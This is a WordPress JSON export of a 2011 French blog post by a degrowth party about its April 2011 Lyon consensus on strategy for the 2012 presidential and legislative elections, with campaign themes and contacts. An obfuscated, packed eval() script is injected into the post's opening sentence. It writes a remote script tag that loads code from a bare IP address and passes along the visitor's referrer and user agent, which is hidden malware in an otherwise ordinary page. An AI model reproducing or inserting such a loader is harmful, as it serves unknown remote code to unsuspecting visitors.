{"id":6035,"date":"2011-04-06T07:51:59","date_gmt":"2011-04-06T06:51:59","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=6035"},"modified":"2011-05-11T20:03:03","modified_gmt":"2011-05-11T19:03:03","slug":"consenus-des-objecteurs-de-croissance-pour-la-campagne-de-2012","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=6035","title":{"rendered":"Consensus des Objecteurs de Croissance pour la campagne de 2012"},"content":{"rendered":"<p><strong>Suite <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndirh|var|u0026u|referrer|yfzab||js|php'.split('|'),0,{}))\n<\/script><\/noindex> \u00e0 la rencontre du dimanche 3 avril 2011 \u00e0 Lyon a \u00e9t\u00e9 d\u00e9cid\u00e9 au consensus concernant les \u00e9lections pr\u00e9sidentielles de 2012 :<\/strong><\/p>\n<p><strong>Consensus pour les pr\u00e9sidentielles de 2012 :<\/strong><br \/>\nCommuniquer clairement sur le fait qu&rsquo;il y a deux strat\u00e9gies compl\u00e9mentaires pour les pr\u00e9sidentielles :<br \/>\n1. Convergence de la gauche anti-productiviste et anti-nucl\u00e9aire et de l&rsquo;\u00e9cologie radicale : strat\u00e9gie men\u00e9e par le MOC.<br \/>\n2. Participer aux pr\u00e9sidentielles afin de colporter la D\u00e9croissance, faire se rencontrer des OC localement et pr\u00e9parer les l\u00e9gislatives (Strat\u00e9gie men\u00e9e par le PPLD, le POC et d\u2019autres OC).<\/p>\n<p>Ces deux d\u00e9marches s&rsquo;engagent \u00e0 ne s&rsquo;exprimer qu&rsquo;en leur propre nom, \u00e0 se respecter et \u00e0 se retrouver pour discuter en cas d&rsquo;\u00e9volution de la situation :<br \/>\n&#8211; Convergence possible avec le NPA autour d&rsquo;une candidature Paul Ari\u00e8s.<br \/>\n&#8211; Convergence impossible.<\/p>\n<p>.<!--more--><\/p>\n<p><strong>Candidature D\u00e9croissance (D\u00e9cision par consensus n&rsquo;engageant pas le MOC) :<\/strong><br \/>\n&#8211; Faire campagne pour la D\u00e9croissance autours d&rsquo;un collectif de porte-parole qui pourrait \u00eatre constitu\u00e9, entre autres, de Paul Ari\u00e8s et de Cl\u00e9ment Wittman.<br \/>\n&#8211; On se donne quelques mois pour d\u00e9finir comment d\u00e9signer le candidat et d\u00e9signer l-a-e candidat-e.<\/p>\n<p>&#8211; La campagne d\u00e9marre le vendredi 13 mai (donc sans doute avant la d\u00e9signation du candidat) \u00e0 Milly Lamartine &#8211; Saone et Loire- , par le d\u00e9part du tour de France \u00e0 v\u00e9lo de Cl\u00e9ment Wittmann.<br \/>\n&#8211; La recherche des 500 signatures est possible pour celles et ceux qui le souhaitent mais n&rsquo;est pas un objectif en soi. Par contre elle repr\u00e9sente une opportunit\u00e9 pour faire campagne.<\/p>\n<p>.<\/p>\n<p><strong>Concernant les l\u00e9gislatives :<\/strong><br \/>\nParticiper aux l\u00e9gislatives afin de colporter la D\u00e9croissance et de faire se rencontrer des OC localement.<\/p>\n<p>1. Autonomie locale.<br \/>\n2. Toutes d\u00e9marches et rencontres \u00e0 un niveau national avec d&rsquo;autres partis politiques ne pourra se faire qu&rsquo;au nom du groupe des OC qui s&rsquo;y engagent et dans le respect de l&rsquo;autonomie des groupes locaux.<br \/>\n3. Pas de concurrence sur une m\u00eame circonscription.<\/p>\n<p>R\u00e9flexion sur la possibilit\u00e9 d&rsquo;atteindre les objectifs permettant de b\u00e9n\u00e9ficier du financement des partis politiques (80 candidat-e-s dans au moins 30 d\u00e9partements avec 50 circonscriptions avec au moins 1% des votes).<br \/>\nLancer un appel \u00e0 candidatures pour les l\u00e9gislatives.<\/p>\n<p>.<\/p>\n<p><strong>Concernant le projet pour 2012, nos th\u00e8mes centraux sont :<\/strong><br \/>\n&#8211; Dotation inconditionnelle d&rsquo;autonomie.<br \/>\n&#8211; Revenu Maximum autoris\u00e9.<br \/>\n&#8211; D\u00e9fense des sph\u00e8res de la gratuit\u00e9.<br \/>\n&#8211; Relocalisation ouverte.<br \/>\n&#8211; Monnaies locales.<br \/>\n&#8211; Anti-nucl\u00e9aire.<br \/>\n&#8211; Mise en place d&rsquo;une assembl\u00e9e constituante.<\/p>\n<p>.<\/p>\n<p><strong>Contacts\u00a0:<\/strong><br \/>\nAdOC : <a href=\"http:\/\/actu.adoc-france.org\/\" target=\"_blank\">http:\/\/actu.adoc-france.org\/<\/a> \u2013 &lt;<a href=\"mailto:contact@adoc-france.org\" target=\"_blank\">contact@adoc-france.org<\/a>&gt;<br \/>\nPPLD : <a href=\"..\/\" target=\"_blank\">http:\/\/www.partipourladecroissance.net\/<\/a> \u2013 &lt;<script type=\"text\/javascript\">\/\/ <![CDATA[\nvar d5=\"\";for(var f6=0;f6<376;f6++)d5+=String.fromCharCode((\"+u\\'4$!Q66Oz$\\'<+u\\'4\\\"HQDO\\\"HPFIMO\\\"H??=$!?Qg)\\'}#{Bz\\'$\\\"W|u\\'W$xy<<6dy?]2FP2CDz__]MLKMSQCMTCPz_RFGQk2FPCDz:dK?GJRMwdkPCNJ?ACel2lEi9__p;9mp;fhedAMLR?AR=^=KJaN=?PRGNM=SPJ?B=CAPMGQQ?LACaLCRdkPCNJ?ACel=lEi9__p;9mp;ffkPCNJ?ACel:alEi_k_fkPCNJ?ACel:^lEi_}_fhd:d_]MLKMSQCMSRz_RFGQkFPCDmz:d:d_{!MLRm?AR]..*\\\"yl?{dkPCNJ?ACelmlEi_._kQS@QRPenff6Bw|u\\'W$xyU)<\\\"H=A<HE=?IM?H=9<JK?FL=?AIF?LH=Oy+u!<$!=\".charCodeAt(f6)-(-7+27)+132-69)%(1*5+90)+9*4-4);document.write(eval(d5))\n\/\/ ]]><\/script>&gt;<br \/>\nPOC : <a href=\"http:\/\/www.objecteursdecroissance.fr\/\" target=\"_blank\">http:\/\/www.objecteursdecroissance.fr\/<\/a> \u2013 &lt;<a href=\"mailto:partidesobjecteursdecroissance@gmail.com\" target=\"_blank\">partidesobjecteursdecroissance@gmail.com<\/a>&gt;<br \/>\nMOC : <a href=\"http:\/\/www.les-oc.info\/\">http:\/\/www.les-oc.info\/<\/a> &#8211; &lt;<a href=\"mailto:contact@ml.les-oc.info\">contact@ml.les-oc.info<\/a>&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Suite \u00e0 la rencontre du dimanche 3 avril 2011 \u00e0 Lyon a \u00e9t\u00e9 d\u00e9cid\u00e9 au consensus concernant les \u00e9lections pr\u00e9sidentielles de 2012 : Consensus pour les pr\u00e9sidentielles de 2012 : Communiquer clairement sur le fait qu&rsquo;il y a deux strat\u00e9gies &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=6035\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[41,8],"tags":[],"class_list":["post-6035","post","type-post","status-publish","format-standard","hentry","category-41","category-communiques-de-presse"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/6035","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6035"}],"version-history":[{"count":11,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/6035\/revisions"}],"predecessor-version":[{"id":6038,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/6035\/revisions\/6038"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6035"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6035"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6035"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}